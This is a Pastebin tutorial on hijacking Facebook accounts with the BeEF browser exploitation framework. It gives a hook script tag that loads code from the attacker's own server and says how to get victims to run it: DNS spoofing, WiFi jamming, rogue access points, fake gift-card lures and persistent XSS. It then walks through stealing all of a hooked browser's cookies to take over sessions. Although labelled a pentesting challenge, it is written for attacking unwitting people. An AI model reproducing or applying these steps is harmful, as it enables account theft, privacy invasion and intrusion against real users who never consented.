Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /////////////////|||||||||||||||||||||||||||||||||||||\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
- 1 written by THEOFFSPRING
- ----- #optraining Facebook hacking with BeEF -----
- Introduction:
- __________________
- This guide is written as part of PenTesting challenge.
- It's aimed for all those that come crying for help with hacking the Facebook,
- hopefully it will lead you to wonderful land of pentesting.
- Requirements:
- __________________
- Only requirement for this guide is that you have BeFF installed, if you are using Kali you already have it pre-installed.
- For Kali: (Applications->Exploitation Tools->BeEF)
- Browser Exploitation Framework:
- __________________
- BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
- Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration
- tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks,
- BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door:
- the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further
- attacks against the system from within the browser context.
- Copyright (c) 2006-2017 Wade Alcorn - wade@bindshell.net
- Browser Exploitation Framework (BeEF) - http://beefproject.com
- The guide:
- __________________
- In this guide I won't go in depth how to use the tool, I'm just going to show you how to hook a browser and get all the cookies.
- Start by starting BeEEF service and navigating to its web server (localhost:3000). The default credentials are beef:beef.
- Now we got our service started and logged in, we are ready to start using this powerful tool! From the web server you'll have access
- to all needed informations, all 'hooked' browsers and logs. So far we haven't infected anyone so the list will be empty.
- The key to hacking Facebook via BeEF is hooking a browser, which means we get victim to execute our code. Getting a victim to visit
- vulnerable web application. Our script will inject the code to the victim which responds to commands we send from our BeEF server.
- Don't worry you won't have to do any scripting yourself, BeEF has JavaScript file 'hook.js', we just need to get victim to execute it,
- this is the trickiest part where you need to get creative. You can use Social Engineering, XSS, spoofing etc...
- If you are on same network as the victim you can do DNS spoofing and get our victim to visit our malicious site which will look legit,
- beside the fact it will have simple script inside:
- <script src="http://[local_ip]:3000/hook.js"></scrip>
- (If you don't know your local_ip just tupe "ifconfig" in terminal)
- However if the victim isn't on our network but in the WiFi range we can fire up WiFi jammer (aireplay-ng, or wifijammer from
- https://github.com/DanMcInerney/wifijammer), and start Rouge AP with common name so our victim will automatically connect. All we need
- to in that case is to once again place the code above in our home page. We can also use tool for all this called wifiphisher from here
- https://github.com/wifiphisher/wifiphisher
- Last scenario is that our victim is far away so we have to do it online. Once again we just need to get the victim to execute that code
- once, with simple web page we can use Social Engineering and ask the victim to check out our site, offer free Gift Cards for short survey
- on the site, etc..I really can't go into much details here because it depense on the situation, do a little intel before the attack and
- you shouldn't have any problems getting victim to visit your site.
- Beside spoofing and Social Engineering we can use persistent XSS, if we manage to place our code on vulnerable site everyone who visit
- that (trusted) site will get 'infected' (hooked).
- Once you've hooked the victim's browser you will be able to access it via BeFF web server, once again you don't have to write any payloads
- yourself, there are prebuild commands we can exeute. Right now we have unlimited possibilities we can do but you're just interested in
- hacking fucking Facebook so let's do that. You'll need to choose "Get All Cookies". It will send command to the browser which will reply
- with all the cookies it has. You have successfully hacked someone's Facebook, now play around with other options it has.
- ------------------------------------------------------------------------------------------------------------------
- ...
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement